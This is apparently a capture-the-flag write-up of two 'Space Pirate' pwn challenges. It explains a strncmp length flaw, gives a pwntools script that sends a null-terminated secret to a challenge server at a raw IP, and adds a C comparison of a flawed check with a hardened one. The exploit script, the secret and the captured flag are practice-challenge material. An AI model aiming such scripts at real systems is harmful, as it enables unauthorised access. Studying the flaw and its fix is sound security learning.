# PWN

## Space Pirate: Entrypoint - Matixx22

Just use the option to insert a password and type anything to get the flag.

## Space Pirate: Going Deeper - Matixx22 (300)

I've disassembled the binary and there are `main` and `admin_panel` functions.

Main:

![](https://i.imgur.com/qJLt8Pv.png)

Looking at the `admin_panel` function:

![](https://i.imgur.com/rn2CWGQ.png)

First of all, we can either overwrite all of the parameters given to the `admin_panel` function or pass `DRAEGER15th30n34nd0nly4dm1n15tr4t0R0fth15sp4c3cr4ft` as input (the option chosen in the binary doesn't matter). Looking at line 27, we can't do the overwrite because there is no space in the buffer, which has a size of 40. Also, the long string we need to pass is 51 chars long.

So I tried to pass the long string as input, but it didn't work. The problem is that the buffer has a size of 40 and `strncmp` compares the first 52 characters in the buffer. That means it is also checking bytes after the buffer. Since the secret string has 51 chars, the last compared byte is garbage pulled from program memory. In C programs every string ends with an additional null byte, `\x00`. Knowing that, we need to ensure that we pass a string that is 52 chars long and ends with a null byte. To do that I wrote a Python script:

```python
#!/usr/bin/env python3

from pwn import *

# Connect to the server
c = remote('178.62.119.24', 32116)

# Receive banner
c.recv()

# Send option '1'
c.sendline(b'1')

# Receive input prompt
c.recv()

# Craft a payload with null byte at the end
payload = b'DRAEGER15th30n34nd0nly4dm1n15tr4t0R0fth15sp4c3cr4ft\x00'

# Send payload
c.sendline(payload)

# Switch script to interactive mode in order to read a flag
c.interactive()
```

Flag: `HTB{n0_n33d_2_ch4ng3_m3ch5_wh3n_u_h4v3_fl0w_r3d1r3ct}`
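
The 52-byte `strncmp` described in the Going Deeper write-up can be reproduced locally. The following is an added example, not the challenge's code: `check_flawed` and `check_hardened` are hypothetical names, the input is assumed to arrive unterminated as from `read()`, and the buffer is 64 bytes rather than 40 so the demo stays in bounds.

```c
#include <stdio.h>
#include <string.h>

/* The 51-character secret quoted in the write-up. */
#define SECRET "DRAEGER15th30n34nd0nly4dm1n15tr4t0R0fth15sp4c3cr4ft"
#define CMP_LEN 52 /* length the write-up says strncmp() is given */

/* Model of the flawed check. Unterminated input lands in a buffer that
 * still holds old bytes; 0xAA stands in for that leftover memory.
 * Assumption: 64 bytes instead of 40 so this demo never overflows. */
int check_flawed(const char *wire, size_t n)
{
    char buf[64];
    memset(buf, 0xAA, sizeof buf);
    if (n > sizeof buf)
        n = sizeof buf;
    memcpy(buf, wire, n);
    /* Byte 52 of SECRET is its NUL terminator, so buf[51] must be NUL. */
    return strncmp(buf, SECRET, CMP_LEN) == 0;
}

/* Hardened form: drop the trailing newline, require the exact length,
 * and compare only bytes that were actually received. */
int check_hardened(const char *wire, size_t n)
{
    if (n > 0 && wire[n - 1] == '\n')
        n--;
    if (n != sizeof SECRET - 1)
        return 0;
    return memcmp(wire, SECRET, n) == 0;
}

int main(void)
{
    const char with_nl[]  = SECRET "\n";   /* constructed: typed + Enter */
    const char with_nul[] = SECRET "\0\n"; /* constructed: script payload */

    printf("flawed,   newline: %d\n", check_flawed(with_nl, sizeof with_nl - 1));
    printf("flawed,   NUL:     %d\n", check_flawed(with_nul, sizeof with_nul - 1));
    printf("hardened, newline: %d\n", check_hardened(with_nl, sizeof with_nl - 1));
    printf("hardened, NUL:     %d\n", check_hardened(with_nul, sizeof with_nul - 1));
    return 0;
}
```

The flawed check rejects the secret followed by a newline because the 52nd compared byte is `\n` rather than `\x00`; the hardened check ties the comparison to the received length instead.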